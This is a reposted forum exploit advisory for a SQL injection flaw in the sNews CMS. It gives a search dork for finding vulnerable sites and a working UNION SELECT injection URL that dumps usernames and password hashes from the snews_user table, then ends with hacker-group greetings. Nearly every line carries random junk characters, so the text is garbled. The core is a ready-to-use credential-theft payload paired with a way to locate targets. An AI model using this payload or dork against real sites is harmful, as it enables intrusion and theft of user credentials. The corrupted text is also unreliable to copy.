标题: CMS snews SQL Injection Vulnerability+ D! Z/ P# w3 w% h
作者: By onestree
- y, A! M' q( w- E- k下载地址 : http://snewscms.com/* [4 ~, l6 ^' u, c: s, P
测试平台 : ubuntu 12.10 / win 77 B0 V. V9 K& b# \/ j3 Q3 A
关键词: inurl:"tanyakan pada rumput yang bergoyang"5 T& i' j9 Z0 G, j, M3 G
9 _) ~6 g6 B/ n0 u9 D1 P
/ c" S" U4 \* {*************************************************************7 E' y6 p2 E* G, c( P; B+ [9 t' o
- \1 Z, S2 n2 x! r/ _( \SQL poc:+ ^6 N+ l: ^$ a( T3 p8 u
# u- M' f' B) U) R! K$ Q V- m/ }http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]9 h) d4 O3 _+ U
3 {" `( [" p; ]* v8 U8 w2 h8 r示例; _# m- a3 x5 ]+ {3 p( b, F2 z
+ `6 C& Z; O- w4 W: k8 t+ ]
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*) h$ V' \! W" \2 L+ _2 j' n5 I
7 s0 h: e0 o/ X4 G8 e
3 n/ X, Z& [4 K1 D% S" g
致谢:% B X: u' c) A0 x b% v* d( ~8 L
# P0 N1 P9 S' {) C% T Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
% p7 v& H0 X. X1 c9 ~6 a 8 C% L! P; v3 p3 O( g+ [
indonesiancoder - moeslimh4x0r - go-coder
5 `/ g! n6 r) X% y* y0 U& K. _ . t q3 W7 Z; w( C5 P; M) j
spesial my hunny :*- o/ w( ~2 i' a
|
发表于 2013-1-23 08:55:06
收藏
支持
反对